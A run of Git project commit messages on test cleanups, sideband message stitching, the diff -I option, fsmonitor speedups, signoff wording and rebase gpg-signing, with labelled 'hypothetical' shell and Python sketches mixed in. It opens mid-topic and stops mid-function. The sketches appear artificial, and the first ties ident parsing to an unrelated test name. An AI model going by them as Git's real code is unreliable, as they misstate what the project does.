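To illustrate what checking the name and email involves, here is a minimal sketch that splits an ident line of the form "Name <email> timestamp timezone". The function names are hypothetical and are not the code used by test_ctime_is_atime.

```shell
# Hypothetical sketch: extract the name from an ident line.
ident_name () {
	ident=$1
	# Drop everything from the first " <" onwards.
	printf '%s\n' "${ident%% <*}"
}

# Hypothetical sketch: extract the email from an ident line.
ident_email () {
	ident=$1
	# Drop everything up to the first "<", then from the first ">" onwards.
	rest=${ident#*<}
	printf '%s\n' "${rest%%>*}"
}
```

An empty result from ident_email, or one matching the author's address, would correspond to the bugs described above.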
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
That way we can notice if there is a breakage/bug in the parts of
the test that prepare the expected outcome, which is how modern
tests are arranged.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modern practice is to avoid multiple commands per line,
and instead place each command on its own line.
Signed-off-by: Charvi Mendiratta <charvi077@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
According to Documentation/CodingGuidelines, redirect
operators are written with a space before them, but no
space after them.
Let's remove the whitespace after redirect operators.
Signed-off-by: Charvi Mendiratta <charvi077@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Support POSIX, bashism and mixed function declarations, all four
compound command types, trailing comments and mixed whitespace.
Even though Bash allows locale-dependent characters in function names
<https://unix.stackexchange.com/a/245336/3645>, only detect function
names with characters allowed by POSIX.1-2017
<https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_235>
for simplicity. This should cover the vast majority of use cases, and
produces system-agnostic results.
Since a word pattern has to be specified, but there is no easy way to
know the default word pattern, use the default `IFS` characters for a
starter. A later patch can improve this.
Signed-off-by: Victor Engmark <victor@engmark.name>
Acked-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We set "use warnings" in most of our perl code to catch problems. But as
the name implies, warnings just emit a message to stderr and don't
otherwise affect the program. So our tests are quite likely to miss that
warnings are being spewed, as most of them do not look at stderr.
We could ask perl to make all warnings fatal, but this is likely
annoying for non-developers, who would rather have a running program
with a warning than something that refuses to work at all.
So instead, let's teach the perl code to respect an environment variable
(GIT_PERL_FATAL_WARNINGS) to increase the severity of the warnings. This
can be set for day-to-day running if people want to be really pedantic,
but the primary use is to trigger it within the test suite.
We could also trigger that for every test run, but likewise even the
tests failing may be annoying to distro builders, etc (just as -Werror
would be for compiling C code). So we'll tie it to a special test-mode
variable (GIT_TEST_PERL_FATAL_WARNINGS) that can be set in the
environment or as a Makefile knob, and we'll automatically turn the knob
when DEVELOPER=1 is set. That should give developers and CI the more
careful view without disrupting normal users or packagers.
Note that the mapping from the GIT_TEST_* form to the GIT_* form in
test-lib.sh is necessary even if they had the same name: the perl
scripts need it to be normalized to a perl truth value, and we also have
to make sure it's exported (we might have gotten it from the
environment, but we might also have gotten it from GIT-BUILD-OPTIONS
directly).
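The mapping could be sketched along these lines. Both function names are hypothetical, and the list of spellings accepted as "true" is an assumption of this example rather than the framework's actual boolean parsing.

```shell
# Hypothetical sketch: accept a few common spellings of "true".
is_true_sketch () {
	case $1 in
	1|true|yes|on)
		return 0
		;;
	*)
		return 1
		;;
	esac
}

# Hypothetical sketch: map the test-mode knob to the variable the perl
# code reads, normalized to "1" and exported.
map_perl_warnings_knob () {
	if is_true_sketch "${GIT_TEST_PERL_FATAL_WARNINGS-}"
	then
		GIT_PERL_FATAL_WARNINGS=1
		export GIT_PERL_FATAL_WARNINGS
	fi
}
```

Normalizing matters because a string such as "false" would otherwise count as a true value in perl.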
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 0512eabd91 ("sequencer: stop abbreviating stopped-sha file",
2020-09-25), Git was taught both to write full object names to the
stopped-sha file and to require full object names when reading. However,
a user would experience a problem if they started an interactive rebase
using an old version of Git and then continued with a current version of
Git (for example, if the system version of Git was updated in the
meantime).
Teach Git to allow object names of any length when reading.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit 9ab33150a0 ("perl: create and switch variables for hash
constants", 2020-06-22) converted each instance of the variable
$sha1_short into $oid_short in the Subversion code, since git-svn now
understands SHA-256. However, one conversion was missed.
As a result, Perl complains about the use of this variable:
Use of uninitialized value $sha1_short in regexp compilation at
/usr/lib64/perl5/vendor_perl/5.30.3/Git/SVN/Log.pm line 301, <$fh>
line 6.
Because we're parsing raw diff output here, the likelihood is very low
that we'll actually misparse the data, since the only lines we're going
to get starting with colons are the ones we're expecting. Even if we
had a newline in a path, we'd end up with a quoted path. Our regex is
just less strict than we'd like it to be.
However, it's obviously undesirable that our code is emitting Perl
warnings, so let's convert it to use the proper variable name.
Reported-by: Nikos Chantziaras <realnc@gmail.com>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The idea of the `SKIP_DASHED_BUILT_INS` option is to stop hard-linking
the built-in commands as separate executables. The patches to do that
specifically excluded the three commands `receive-pack`,
`upload-archive` and `upload-pack`, though: these commands are expected
to be present in the `PATH` in their dashed form on the server side of
any fetch/push.
However, due to an oversight on my part, even though those commands were
still hard-linked, they were not installed into `bin/`.
Noticed-by: Michael Forney <mforney@mforney.org>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 2b6ad0f4bc ("rebase --rebase-merges: add support for octopus
merges", 2017-12-21) introduced a case where rollback_lock_file() was
unconditionally called twice in a row with no intervening commands.
Remove the duplicate.
Signed-off-by: Elijah Newren <newren@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modernize the test by replacing `test -e` instances with
`test_path_is_file` helper functions, and `! test -e` with
`test_path_is_missing`, for better readability and diagnostic messages.
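The diagnostic benefit can be seen in a minimal sketch of such helpers. The names path_is_file_sketch and path_is_missing_sketch and the message wording are hypothetical; the real helpers are provided by the test framework.

```shell
# Hypothetical sketch: succeed if $1 is a regular file, else explain why not.
path_is_file_sketch () {
	if ! test -f "$1"
	then
		echo "File $1 doesn't exist" >&2
		return 1
	fi
}

# Hypothetical sketch: succeed if $1 does not exist, else explain why not.
path_is_missing_sketch () {
	if test -e "$1"
	then
		echo "Path $1 exists" >&2
		return 1
	fi
}
```

A bare `test -e` fails silently, whereas helpers of this shape leave a message in the test output saying which path was at fault.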
Signed-off-by: Joey Salazar <jgsal@protonmail.com>
Reviewed-by: Phillip Wood <phillip.wood123@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A patch changing a symlink into a file is written with 2 sections (in
the code, represented as "struct patch"): firstly, the deletion of the
symlink, and secondly, the creation of the file. When applying that
patch with -R, the sections are reversed, so we get:
(1) creation of a symlink, then
(2) deletion of a file.
This causes an issue when the "deletion of a file" section is checked,
because Git observes that the so-called file is not a file but a
symlink, resulting in a "wrong type" error message.
What we want is:
(1) deletion of a file, then
(2) creation of a symlink.
In the code, this is reflected in the behavior of previous_patch() when
invoked from check_preimage() when the deletion is checked. Creation
then deletion means that when the deletion is checked, previous_patch()
returns the creation section, triggering a mode conflict resulting in
the "wrong type" error message. But deletion then creation means that
when the deletion is checked, previous_patch() returns NULL, so the
deletion mode is checked against lstat, which is what we want.
There are also other ways a patch can contain 2 sections referencing the
same file, for example, in 7a07841c0b ("git-apply: handle a patch that
touches the same path more than once better", 2008-06-27). "git apply
-R" fails in the same way, and this commit makes this case succeed.
Therefore, when building the list of sections, build them in reverse
order (by adding to the front of the list instead of the back) when -R
is passed.
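The effect of adding to the front instead of the back can be sketched as follows. The function build_sections and the section labels are hypothetical; the real code builds a linked list of "struct patch".

```shell
# Hypothetical sketch: build the list of sections in parse order, or in
# reverse order when $1 is "yes" (standing in for -R).
build_sections () {
	reverse=$1
	shift
	list=
	for section in "$@"
	do
		if test "$reverse" = yes
		then
			# Add to the front of the list.
			list="$section${list:+ $list}"
		else
			# Add to the back of the list.
			list="${list:+$list }$section"
		fi
	done
	echo "$list"
}
```

With -R, the parsed sections "create-symlink delete-file" come out as "delete-file create-symlink", which is the order wanted above.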
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It was pretty tricky to verify that incomplete sideband messages are
handled correctly by the `recv_sideband()`/`demultiplex_sideband()`
code: they have to be flushed out at the end of the loop in
`recv_sideband()`, but the actual flushing is done by the
`demultiplex_sideband()` function (which therefore has to know somehow
that the loop will be done after it returns).
To catch future bugs where incomplete sideband messages might not be
shown by mistake, let's catch that condition and report a bug.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 2b695ecd74 (t5500: count objects through stderr, not trace,
2020-05-06) we tried to ensure that the "Total 3" message could be
grepped in Git's output, even if it sometimes got chopped up into
multiple lines in the trace machinery.
However, the first instance where this mattered now goes through the
sideband machinery, where it is _still_ possible for messages to get
chopped up: it *is* possible for the standard error stream to be sent
byte-for-byte and hence it can be easily interrupted. Meaning: it is
possible for the single line that we're looking for to be chopped up
into multiple sideband packets, with a primary packet being delivered
between them.
This seems to happen occasionally in the `vs-test` part of our CI
builds, i.e. with binaries built using Visual C, but not when building
with GCC or clang. The symptom is that t5500.43 fails to find a line
matching `remote: Total 3` in the `log` file, which ends in something
along these lines:
remote: Tota
remote: l 3 (delta 0), reused 0 (delta 0), pack-reused 0
This should not happen, though: we have code in `demultiplex_sideband()`
_specifically_ to stitch back together lines that were delivered in
separate sideband packets.
However, this stitching was broken in a subtle way in fbd76cd450
(sideband: reverse its dependency on pkt-line, 2019-01-16): before that
change, incomplete sideband lines would not be flushed upon receiving a
primary packet, but after that patch, they would be.
The subtleness of this bug comes from the fact that it is easy to get
confused by the ambiguous meaning of the `break` keyword: after writing
the primary packet contents, the `break;` in the original version of
`recv_sideband()` does _not_ break out of the `while` loop, but instead
only ends the `switch` case:
	while (!retval) {
		[...]
		switch (band) {
		[...]
		case 1:
			/* Write the contents of the primary packet */
			write_or_die(out, buf + 1, len);
			/* Here, we do *not* break out of the loop, `retval` is unchanged */
			break;
		[...]
	}

	if (outbuf.len) {
		/* Write any remaining sideband messages lacking a trailing LF */
		strbuf_addch(&outbuf, '\n');
		xwrite(2, outbuf.buf, outbuf.len);
	}
In contrast, after fbd76cd450 (sideband: reverse its dependency on
pkt-line, 2019-01-16), the body of the `while` loop was extracted into
`demultiplex_sideband()`, crucially _including_ the logic to write
incomplete sideband messages:
	switch (band) {
	[...]
	case 1:
		*sideband_type = SIDEBAND_PRIMARY;
		/* This does not break out of the loop: the loop is in the caller */
		break;
	[...]
	}

cleanup:
	[...]
	/* This logic is now no longer _outside_ the loop but _inside_ */
	if (scratch->len) {
		strbuf_addch(scratch, '\n');
		xwrite(2, scratch->buf, scratch->len);
	}
The correct way to fix this is to return from `demultiplex_sideband()`
early. The caller will then write out the contents of the primary packet
and continue looping. The `scratch` buffer for incomplete sideband
messages is owned by that caller, and will continue to accumulate the
remainder(s) of those messages. The loop will only end once
`demultiplex_sideband()` returned non-zero _and_ did not indicate a
primary packet, which is the case only when we hit the `cleanup:` path,
in which we take care of flushing any unfinished sideband messages and
release the `scratch` buffer.
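The intended behavior can be modeled with a small sketch. It is not the C implementation: the function demux_sketch, the "band:payload" argument format and the output labels are all hypothetical, and both streams are printed to standard output for simplicity.

```shell
# A literal newline, used to detect complete sideband lines.
nl='
'

# Hypothetical sketch: each argument is "<band>:<payload>". Band 1 is a
# primary packet, band 2 is a sideband message fragment.
demux_sketch () {
	scratch=
	for pkt in "$@"
	do
		band=${pkt%%:*}
		payload=${pkt#*:}
		case $band in
		1)
			# Primary packet: write it out, leave scratch untouched.
			printf 'primary: %s\n' "$payload"
			;;
		2)
			# Accumulate, then emit only complete lines.
			scratch=$scratch$payload
			while true
			do
				case $scratch in
				*"$nl"*)
					line=${scratch%%"$nl"*}
					printf 'remote: %s\n' "$line"
					scratch=${scratch#*"$nl"}
					;;
				*)
					break
					;;
				esac
			done
			;;
		esac
	done
	# Only at the very end: flush a message lacking a trailing LF.
	if test -n "$scratch"
	then
		printf 'remote: %s\n' "$scratch"
	fi
}
```

Feeding it a message split around a primary packet, such as "2:Tota", "1:PACKDATA" and "2:l 3" followed by a newline, yields one intact "remote: Total 3" line instead of two fragments.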
To ensure that this does not get broken again, we introduce a pair of
subcommands of the `pkt-line` test helper that specifically chop up the
sideband message and squeeze a primary packet into the middle.
Final note: The other test case touched by 2b695ecd74 (t5500: count
objects through stderr, not trace, 2020-05-06) is not affected by this
issue because the sideband machinery is not involved there.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t7102 and t7201 still follow the old style of having blank
lines around the test body, which is not consistent with our
current practice.
Let's remove those unnecessary blank lines.
Signed-off-by: Charvi Mendiratta <charvi077@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some tests in these scripts are formatted using a very old style:

	test_expect_success \
	    'title' \
	    'body line 1 &&
	    body line 2'

Update the formatting to the modern style:

	test_expect_success 'title' '
		body line 1 &&
		body line 2
	'
Signed-off-by: Charvi Mendiratta <charvi077@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a new diff option that enables ignoring changes in which all lines
(changed, removed, and added) match a given regular expression. This is
similar to the -I/--ignore-matching-lines option in standalone diff
utilities and can be used e.g. to ignore changes which only affect code
comments or to look for unrelated changes in commits containing a large
number of automatically applied modifications (e.g. a tree-wide string
replacement). The difference between -G/-S and the new -I option is
that the latter filters output on a per-change basis.
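The per-change rule can be sketched outside of Git as follows. The function change_is_ignorable is hypothetical and uses grep on individual lines; it only models the rule that a change is ignored when every one of its lines matches, and is not how xdiff implements it.

```shell
# Hypothetical sketch: $1 is the regular expression, the remaining
# arguments are the removed and added lines of a single change.
change_is_ignorable () {
	regex=$1
	shift
	for line in "$@"
	do
		# One non-matching line is enough to keep the change.
		printf '%s\n' "$line" | grep -E -q -e "$regex" || return 1
	done
	return 0
}
```

With the regex '^#', a change touching only comment lines is ignorable, while a change that also touches a line such as "x=1" is still shown.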
Use the 'ignore' field of xdchange_t for marking a change as ignored or
not. Since the same field is used by --ignore-blank-lines, identical
hunk emitting rules apply for --ignore-blank-lines and -I. These two
options can also be used together in the same git invocation (they are
complementary to each other).
Rename xdl_mark_ignorable() to xdl_mark_ignorable_lines(), to indicate
that it is logically a "sibling" of xdl_mark_ignorable_regex() rather
than its "parent".
Signed-off-by: Michał Kępień <michal@isc.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
xpparam_t structures are usually zero-initialized before their specific
fields are assigned to, but there are three locations in the tree where
that does not happen. Add the missing memset() calls in order to make
initialization of xpparam_t structures consistent tree-wide and to
prevent stack garbage from being used as field values.
Signed-off-by: Michał Kępień <michal@isc.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Much of the benchmark code is redundant. Removing the redundancy makes
it easier to understand and edit.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Perf tests have not been linted for some time.
As a result, some uses of seq have crept in where test_seq
should be used. Run the existing lints on the perf tests as well.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Results for the git-diff fsmonitor optimization from the patch
in the parent revision (tested on a repository with 400k files).
As the numbers below show, git diff with fsmonitor running is
significantly faster with this patch series (about 80% faster on
my workload).
GIT_PERF_LARGE_REPO=~/src/server ./run v2.29.0-rc1 . -- p7519-fsmonitor.sh
Test                                                                     v2.29.0-rc1       this tree
-----------------------------------------------------------------------------------------------------------------
7519.2: status (fsmonitor=.git/hooks/fsmonitor-watchman)                 1.46(0.82+0.64)   1.47(0.83+0.62) +0.7%
7519.3: status -uno (fsmonitor=.git/hooks/fsmonitor-watchman)            0.16(0.12+0.04)   0.17(0.12+0.05) +6.3%
7519.4: status -uall (fsmonitor=.git/hooks/fsmonitor-watchman)           1.36(0.73+0.62)   1.37(0.76+0.60) +0.7%
7519.5: diff (fsmonitor=.git/hooks/fsmonitor-watchman)                   0.85(0.22+0.63)   0.14(0.10+0.05) -83.5%
7519.6: diff -- 0_files (fsmonitor=.git/hooks/fsmonitor-watchman)        0.12(0.08+0.05)   0.13(0.11+0.02) +8.3%
7519.7: diff -- 10_files (fsmonitor=.git/hooks/fsmonitor-watchman)       0.12(0.08+0.04)   0.13(0.09+0.04) +8.3%
7519.8: diff -- 100_files (fsmonitor=.git/hooks/fsmonitor-watchman)      0.12(0.07+0.05)   0.13(0.07+0.06) +8.3%
7519.9: diff -- 1000_files (fsmonitor=.git/hooks/fsmonitor-watchman)     0.12(0.09+0.04)   0.13(0.08+0.05) +8.3%
7519.10: diff -- 10000_files (fsmonitor=.git/hooks/fsmonitor-watchman)   0.14(0.09+0.05)   0.13(0.10+0.03) -7.1%
7519.12: status (fsmonitor=)                                             1.67(0.93+1.49)   1.67(0.99+1.42) +0.0%
7519.13: status -uno (fsmonitor=)                                        0.37(0.30+0.82)   0.37(0.33+0.79) +0.0%
7519.14: status -uall (fsmonitor=)                                       1.58(0.97+1.35)   1.57(0.86+1.45) -0.6%
7519.15: diff (fsmonitor=)                                               0.34(0.28+0.83)   0.34(0.27+0.83) +0.0%
7519.16: diff -- 0_files (fsmonitor=)                                    0.09(0.06+0.04)   0.09(0.08+0.02) +0.0%
7519.17: diff -- 10_files (fsmonitor=)                                   0.09(0.07+0.03)   0.09(0.06+0.05) +0.0%
7519.18: diff -- 100_files (fsmonitor=)                                  0.09(0.06+0.04)   0.09(0.06+0.04) +0.0%
7519.19: diff -- 1000_files (fsmonitor=)                                 0.09(0.06+0.04)   0.09(0.05+0.05) +0.0%
7519.20: diff -- 10000_files (fsmonitor=)                                0.10(0.08+0.04)   0.10(0.06+0.05) +0.0%
I also added a benchmark for a tiny git diff workload w/ a pathspec.
I see an approximately .02 second overhead added w/ and w/o fsmonitor.
From looking at these results, I suspected that refresh_fsmonitor
is already happening during git diff - independent of this patch
series' optimization. I confirmed that suspicion by breaking on
refresh_fsmonitor.
(gdb) bt [simplified]
0 refresh_fsmonitor at fsmonitor.c:176
1 ie_match_stat at read-cache.c:375
2 match_stat_with_submodule at diff-lib.c:237
4 builtin_diff_files at builtin/diff.c:260
5 cmd_diff at builtin/diff.c:541
6 run_builtin at git.c:450
7 handle_builtin at git.c:700
8 run_argv at git.c:767
9 cmd_main at git.c:898
10 main at common-main.c:52
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The first git status would be inflated due to warming of
filesystem cache. This makes the results comparable.
Before

Test                                                             this tree
--------------------------------------------------------------------------------
7519.2: status (fsmonitor=.git/hooks/fsmonitor-watchman)         2.52(1.59+1.56)
7519.3: status -uno (fsmonitor=.git/hooks/fsmonitor-watchman)    0.18(0.12+0.06)
7519.4: status -uall (fsmonitor=.git/hooks/fsmonitor-watchman)   1.36(0.73+0.62)
7519.7: status (fsmonitor=)                                      0.69(0.52+0.90)
7519.8: status -uno (fsmonitor=)                                 0.37(0.28+0.81)
7519.9: status -uall (fsmonitor=)                                1.53(0.93+1.32)

After

Test                                                             this tree
--------------------------------------------------------------------------------
7519.2: status (fsmonitor=.git/hooks/fsmonitor-watchman)         0.39(0.33+0.06)
7519.3: status -uno (fsmonitor=.git/hooks/fsmonitor-watchman)    0.17(0.13+0.05)
7519.4: status -uall (fsmonitor=.git/hooks/fsmonitor-watchman)   1.34(0.77+0.56)
7519.7: status (fsmonitor=)                                      0.70(0.53+0.90)
7519.8: status -uno (fsmonitor=)                                 0.37(0.32+0.78)
7519.9: status -uall (fsmonitor=)                                1.55(1.01+1.25)
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With fsmonitor enabled, the first call to match_stat_with_submodule
calls refresh_fsmonitor, incurring the overhead of reading the list of
updated files -- but run_diff_files does not respect the
CE_FSMONITOR_VALID flag.
Make use of the fsmonitor extension to skip lstat() calls on files
that fsmonitor judged as unmodified.
Notably, this change improves performance of the git shell prompt when
GIT_PS1_SHOWDIRTYSTATE is set.
Signed-off-by: Alex Vandiver <alexmv@dropbox.com>
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit d572f52a64c6a69990f72ad6a09504b9b615d2e4; the
idea to detect that "test_cmp expect actual" was fed a misspelt
filename meant well, but when the version of Git tested exhibits a
bug, the reason why these two files do not match may be because one
of them did not get created as expected, in which case missing file
is not a sign of misspelt filename but is a genuine test failure.
Acked-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Ted reported an old typo in the git-commit.txt and merge-options.txt.
Namely, the phrase "Signed-off-by line" was used without either a
definite or an indefinite article.
Upon examination, it seems that the documentation (including items in
Documentation/, but also option help strings) has been quite
inconsistent on usage when referring to `Signed-off-by`.
First, very few places used a definite or indefinite article with the
phrase "Signed-off-by line", but that was the initial typo that led
to this investigation. So, normalize using either an indefinite or
definite article consistently.
The original phrasing, in Commit 3f971fc425 (Documentation updates,
2005-08-14), is "Add Signed-off-by line". Commit 6f855371a5 (Add
--signoff, --check, and long option-names. 2005-12-09) switched to
using "Add `Signed-off-by:` line", but didn't normalize the former
commit to match. Later commits seem to have cut and pasted from one
or the other, which is likely how the usage became so inconsistent.
Junio stated on the git mailing list in
<xmqqy2k1dfoh.fsf@gitster.c.googlers.com> a preference to leave off
the colon. Thus, prefer `Signed-off-by` (with backticks) for the
documentation files and Signed-off-by (without backticks) for option
help strings.
Additionally, Junio argued that "trailer" is now the standard term to
refer to `Signed-off-by`, saying that "becomes plenty clear that we
are not talking about any random line in the log message". As such,
prefer "trailer" over "line" anywhere the former word fits.
However, leave alone those few places in documentation that use
Signed-off-by to refer to the process (rather than the specific
trailer), or in places where mail headers are generally discussed in
comparison with Signed-off-by.
Reported-by: "Theodore Y. Ts'o" <tytso@mit.edu>
Signed-off-by: Bradley M. Kuhn <bkuhn@sfconservancy.org>
Acked-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The description on sign-off and DCO was written back in the days
where there was only a choice between "use sign-off and it means the
contributor agrees to the Linux-kernel style DCO" and "not using
sign-off at all will make your patch unusable". These days, we are
trying to clarify that the exact meaning of a sign-off varies
project to project.
Let's be more explicit when presenting what _our_ rules are. It is
of secondary importance that it originally came from the kernel
project, so move the description as a historical note at the end,
while cautioning that what a sign-off means to us may be different from
what it means to other projects contributors may have been used to.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Bradley M. Kuhn <bkuhn@sfconservancy.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Building on past documentation improvements in b2c150d3aa (Expand
documentation describing --signoff, 2016-01-05), further clarify
that any project using Git may and often does set its own policy.
However, leave intact reference to the Linux DCO, which Git also
uses. It is reasonable for Git to advocate for its own Signed-off-by
methodology in its documentation, as long as the documentation
remains respectful that YMMV and other projects may well have very
different contributor representations tied to Signed-off-by.
Signed-off-by: Bradley M. Kuhn <bkuhn@sfconservancy.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Almost identical text on the signed-off-by trailer appears in the
documentation for "git commit" and "git merge" and its friends.
Introduce a new signoff-option.txt file to be shared. A couple of
things of note are:
- The short-form "-s" is available only in "git commit", but not in
commands that are friends of "git merge", as it is used as a
short-hand for "--strategy".
- The original lacks description on the negated "--no-signoff" form
on "git commit" side, but it equally is applicable. It however
was unclear in the original text that not adding a Signed-off-by
trailer is the default, so rephrase to explain it as a way to
countermand a --signoff option that appeared earlier on the same
command line.
This is in preparation to apply a further clarification on what
exactly the Signed-off-by trailer means.
Suggested-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Bradley M. Kuhn <bkuhn@sfconservancy.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Avoid placing `git` upstream in a pipe since doing so throws away
its exit code, thus an unexpected failure may go unnoticed.
Signed-off-by: Amanda Shafack <shafack.likhene@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When using the --run flag to run just two or three tests from a test
file which contains several dozen tests, having every skipped test print
out dozens of lines of output for the test code for that skipped test
(in addition to the TAP output line) adds up to hundreds or thousands of
lines of irrelevant output that make it very hard to fish out the
relevant results you were looking for. Simplify the output for skipped
tests to remove this extra output, leaving only the TAP output line
(i.e. the line reading "ok <number> # skip <test-description>", which
already mentions that the test was "skip"ped).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
With the new ability to pass --run=setup to select which tests to run,
it is more convenient if tests use the term "setup" instead of synonyms
like 'prepare' or 'rebuild'. There are undoubtedly many other tests in
our testsuite that could be changed over too; these are just a couple
that I ran into.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many of our test scripts have several "setup" tests. It's a lot easier
to say
./t0050-filesystem.sh --run=setup,9
in order to run all the setup tests as well as test #9, than it is to
track down what all the setup tests are and enter all their numbers in
the list. Also, I often find myself wanting to run just one or a couple
tests from the test file, but I don't know the numbering of any of the
tests -- to get it I have to either run the whole test file first,
start counting by hand, or figure out some other clever but non-obvious
trick. It's really convenient to be able to just look at the test
description(s) and then run
./t6416-recursive-corner-cases.sh --run=symlink
or
./t6402-merge-rename.sh --run='setup,unnecessary update'
Add such an ability to test selection which relies on merely matching
against the test description.
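The selection rule can be sketched roughly as follows. This is a minimal
Python model, not the shell code in the test library; the function name
`is_selected`, the sample test descriptions, and the plain substring match
are assumptions made for illustration, and range or negation selectors are
left out.

```python
def is_selected(selectors, number, description):
    """Return True if test `number` with `description` matches any selector.

    A selector made only of digits picks a test by number; anything else
    is matched against the test description (assumed here to be a plain
    substring match).
    """
    for selector in selectors.split(","):
        selector = selector.strip()
        if not selector:
            continue
        if selector.isdigit():
            if int(selector) == number:
                return True
        elif selector in description:
            return True
    return False


# Hypothetical test numbers and descriptions, for illustration only.
tests = [
    (1, "setup"),
    (2, "detect case change"),
    (3, "setup unicode file names"),
    (9, "merge with rename"),
]
chosen = [n for n, desc in tests if is_selected("setup,9", n, desc)]
print(chosen)
```

With the selector list "setup,9", both tests whose description mentions
"setup" are picked up along with test #9, without the caller having to
know the numbers of the setup tests.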
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t7518.1 added in commit 862e80a413 ("ident: handle NULL email when
complaining of empty name", 2017-02-23), was trying to make sure that
the test with an empty ident did not segfault and did not result in
glibc quietly translating a NULL pointer into a name of "(null)". It did
the latter by ensuring that a grep for "null" didn't appear in the
output, but on one automatic CI run I observed the following output:
fatal: empty ident name (for <runner@fv-az128-670.gcliasfzo2nullsdbrimjtbyhg.cx.internal.cloudapp.net>) not allowed
Note that 'null' appears as a substring of the domain name, found
within 'gcliasfzo2nullsdbrimjtbyhg'. Tighten the test by searching for
"(null)" rather than "null".
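The difference between the two patterns can be checked against the
message quoted above. The snippet below is only an illustration in
Python using substring tests; the actual test uses grep.

```python
message = (
    "fatal: empty ident name (for <runner@fv-az128-670."
    "gcliasfzo2nullsdbrimjtbyhg.cx.internal.cloudapp.net>) not allowed"
)

# The loose check trips over the hostname, even though no NULL pointer
# was formatted into the message.
loose_match = "null" in message

# The tightened check looks for the literal text that a NULL string
# argument would have been turned into.
tight_match = "(null)" in message

print(loose_match, tight_match)
```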
Signed-off-by: Elijah Newren <newren@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add test cases of various combinations of the commit.gpgsign option and
--gpg-sign, --no-gpg-sign flags with rebase -r with the default merge
strategy. This exercises a different code-path from those with octopus
merges or overridden merge strategy with rebase -s.
Signed-off-by: Samuel Čavoj <samuel@cavoj.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The merge subcommand launched for merges with non-default strategy would
use its own default behaviour to decide how to sign commits, regardless
of what opts->gpg_sign was set to. For example the --no-gpg-sign flag
given to rebase explicitly would get ignored, if commit.gpgsign was set
to true.
Fix the issue and add a test case exercising this behaviour.
Signed-off-by: Samuel Čavoj <samuel@cavoj.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When performing a rebase with --rebase-merges using either a custom
strategy specified with -s or an octopus merge, and at the same time
having gpgsign enabled (either rebase -S or config commit.gpgsign), the
operation would fail on making the merge commit. Instead of "-S%s" with
the key id substituted, only the bare key id would get passed to the
underlying merge command, which tried to interpret it as a ref.
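As a rough illustration of the difference, the following Python sketch
builds the argument list both ways. The function names, the key id, and
the surrounding "merge -s octopus" arguments are hypothetical; only the
"-S%s" formatting comes from the description above.

```python
def merge_args_buggy(gpg_sign_key):
    # Model of the broken behaviour: the bare key id is appended, so the
    # merge command would read it as something to merge.
    args = ["merge", "-s", "octopus"]
    if gpg_sign_key:
        args.append(gpg_sign_key)
    return args


def merge_args_fixed(gpg_sign_key):
    # Model of the intended behaviour: the key id is substituted into
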